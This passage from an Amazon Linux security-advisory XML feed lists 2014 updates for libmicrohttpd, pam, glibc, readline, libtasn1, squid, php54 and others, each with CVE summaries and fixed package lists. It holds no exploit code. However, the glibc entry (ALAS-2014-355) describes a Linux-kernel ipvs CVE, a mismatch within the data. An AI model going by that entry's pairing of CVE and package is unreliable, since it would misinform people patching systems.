</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3466" title="" id="CVE-2014-3466" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0595.html" title="" id="RHSA-2014:0595" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-guile" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-14.13.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-14.13.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-14.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-353</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-353: important priority package update for libmicrohttpd</title><issued date="2014-06-15 16:17:00" /><updated date="2014-09-19 10:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7039:
Stack-based buffer overflow in the MHD_digest_auth_check function in libmicrohttpd before 0.9.32, when MHD_OPTION_CONNECTION_MEMORY_LIMIT is set to a large value, allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long URI in an authentication header.
1039390:
CVE-2013-7039 libmicrohttpd: stack overflow in MHD_digest_auth_check()
CVE-2013-7038:
The MHD_http_unescape function in libmicrohttpd before 0.9.32 might allow remote attackers to obtain sensitive information or cause a denial of service (crash) via unspecified vectors that trigger an out-of-bounds read.
1039384:
CVE-2013-7038 libmicrohttpd: out-of-bounds read in MHD_http_unescape()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7038" title="" id="CVE-2013-7038" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7039" title="" id="CVE-2013-7039" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libmicrohttpd-devel" version="0.9.33" release="2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmicrohttpd-devel-0.9.33-2.3.amzn1.x86_64.rpm</filename></package><package name="libmicrohttpd" version="0.9.33" release="2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmicrohttpd-0.9.33-2.3.amzn1.x86_64.rpm</filename></package><package name="libmicrohttpd-doc" version="0.9.33" release="2.3.amzn1" epoch="0" arch="noarch"><filename>Packages/libmicrohttpd-doc-0.9.33-2.3.amzn1.noarch.rpm</filename></package><package name="libmicrohttpd-debuginfo" version="0.9.33" release="2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmicrohttpd-debuginfo-0.9.33-2.3.amzn1.x86_64.rpm</filename></package><package name="libmicrohttpd-devel" version="0.9.33" release="2.3.amzn1" epoch="0" arch="i686"><filename>Packages/libmicrohttpd-devel-0.9.33-2.3.amzn1.i686.rpm</filename></package><package name="libmicrohttpd" version="0.9.33" release="2.3.amzn1" epoch="0" arch="i686"><filename>Packages/libmicrohttpd-0.9.33-2.3.amzn1.i686.rpm</filename></package><package name="libmicrohttpd-debuginfo" version="0.9.33" release="2.3.amzn1" epoch="0" arch="i686"><filename>Packages/libmicrohttpd-debuginfo-0.9.33-2.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-354</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-354: medium priority package update for pam</title><issued date="2014-06-15 16:18:00" /><updated date="2014-09-19 10:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2583:
Multiple directory traversal vulnerabilities in pam_timestamp.c in the pam_timestamp module for Linux-PAM (aka pam) 1.1.8 allow local users to create aribitrary files or possibly bypass authentication via a .. (dot dot) in the (1) PAM_RUSER value to the get_ruser function or (2) PAM_TTY value to the check_tty funtion, which is used by the format_timestamp_name function.
1080243:
CVE-2014-2583 pam: path traversal issue in pam_timestamp's format_timestamp_name()
CVE-2013-7041:
The pam_userdb module for Pam uses a case-insensitive method to compare hashed passwords, which makes it easier for attackers to guess the password via a brute force attack.
1038555:
CVE-2013-7041 pam: pam_userdb case insensitive password hash comparison
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7041" title="" id="CVE-2013-7041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2583" title="" id="CVE-2014-2583" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam" version="1.1.8" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-1.1.8-9.29.amzn1.x86_64.rpm</filename></package><package name="pam-devel" version="1.1.8" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-devel-1.1.8-9.29.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-debuginfo-1.1.8-9.29.amzn1.x86_64.rpm</filename></package><package name="pam" version="1.1.8" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/pam-1.1.8-9.29.amzn1.i686.rpm</filename></package><package name="pam-devel" version="1.1.8" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/pam-devel-1.1.8-9.29.amzn1.i686.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/pam-debuginfo-1.1.8-9.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-355</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-355: low priority package update for glibc</title><issued date="2014-06-15 16:19:00" /><updated date="2014-09-19 10:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4588:
Multiple stack-based buffer overflows in net/netfilter/ipvs/ip_vs_ctl.c in the Linux kernel before 2.6.33, when CONFIG_IP_VS is used, allow local users to gain privileges by leveraging the CAP_NET_ADMIN capability for (1) a getsockopt system call, related to the do_ip_vs_get_ctl function, or (2) a setsockopt system call, related to the do_ip_vs_set_ctl function.
1030800:
CVE-2013-4588 Kernel: net: ipvs: stack buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4588" title="" id="CVE-2013-4588" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-static" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.84.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.84.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.84.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.84.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-356</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-356: low priority package update for perltidy</title><issued date="2014-06-15 16:19:00" /><updated date="2014-09-19 10:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2277:
1074720:
CVE-2014-2277 perltidy: insecure temporary file creation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2277" title="" id="CVE-2014-2277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perltidy" version="20121207" release="3.8.amzn1" epoch="0" arch="noarch"><filename>Packages/perltidy-20121207-3.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-357</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-357: low priority package update for readline</title><issued date="2014-06-15 16:20:00" /><updated date="2014-09-19 10:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2524:
1077023:
CVE-2014-2524 readline: insecure temporary file use in _rl_tropen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2524" title="" id="CVE-2014-2524" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="readline-debuginfo" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-debuginfo-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline-static" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-static-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline-devel" version="6.2" release="9.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/readline-devel-6.2-9.14.amzn1.x86_64.rpm</filename></package><package name="readline-debuginfo" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-debuginfo-6.2-9.14.amzn1.i686.rpm</filename></package><package name="readline" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-6.2-9.14.amzn1.i686.rpm</filename></package><package name="readline-devel" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-devel-6.2-9.14.amzn1.i686.rpm</filename></package><package name="readline-static" version="6.2" release="9.14.amzn1" epoch="0" arch="i686"><filename>Packages/readline-static-6.2-9.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-358</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-358: low priority package update for perl-Capture-Tiny</title><issued date="2014-06-15 16:20:00" /><updated date="2014-09-19 10:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1875:
1062424:
CVE-2014-1875 perl-Capture-Tiny: insecure temporary file usage
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1875" title="" id="CVE-2014-1875" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Capture-Tiny" version="0.24" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Capture-Tiny-0.24-1.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-359</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-359: medium priority package update for libtasn1</title><issued date="2014-06-15 16:22:00" /><updated date="2014-09-19 10:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3469:
Multiple NULL pointer dereference flaws were found in libtasn1's asn1_read_value() function. Specially crafted ASN.1 input could cause an application using libtasn1 to crash, if the application used the aforementioned function in a certain way.
CVE-2014-3468:
It was discovered that the asn1_get_bit_der() function of the libtasn1 library incorrectly reported the length of ASN.1-encoded data. Specially crafted ASN.1 input could cause an application using libtasn1 to perform an out-of-bounds access operation, causing the application to crash or, possibly, execute arbitrary code.
CVE-2014-3467:
Multiple incorrect buffer boundary check issues were discovered in libtasn1. Specially crafted ASN.1 input could cause an application using libtasn1 to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3467" title="" id="CVE-2014-3467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3468" title="" id="CVE-2014-3468" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3469" title="" id="CVE-2014-3469" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0596.html" title="" id="RHSA-2014:0596" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtasn1-debuginfo" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-debuginfo-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-devel-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1-tools" version="2.3" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtasn1-tools-2.3-6.6.amzn1.x86_64.rpm</filename></package><package name="libtasn1-devel" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-devel-2.3-6.6.amzn1.i686.rpm</filename></package><package name="libtasn1" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-2.3-6.6.amzn1.i686.rpm</filename></package><package name="libtasn1-tools" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-tools-2.3-6.6.amzn1.i686.rpm</filename></package><package name="libtasn1-debuginfo" version="2.3" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/libtasn1-debuginfo-2.3-6.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-360</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-360: medium priority package update for squid</title><issued date="2014-06-15 16:22:00" /><updated date="2014-09-19 10:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0128:
A denial of service flaw was found in the way Squid processed certain HTTPS requests when the SSL Bump feature was enabled. A remote attacker could send specially crafted requests that could cause Squid to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0128" title="" id="CVE-2014-0128" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0597.html" title="" id="RHSA-2014:0597" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.1.10" release="20.15.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.10-20.15.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="20.15.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.10-20.15.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="20.15.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.10-20.15.amzn1.i686.rpm</filename></package><package name="squid" version="3.1.10" release="20.15.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.10-20.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-361</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-361: medium priority package update for php54</title><issued date="2014-06-15 16:29:00" /><updated date="2014-09-19 10:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pspell" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.29" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.29-1.55.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.29-1.55.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.29" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.29-1.55.amzn1.i686.rpm</filename></package><package 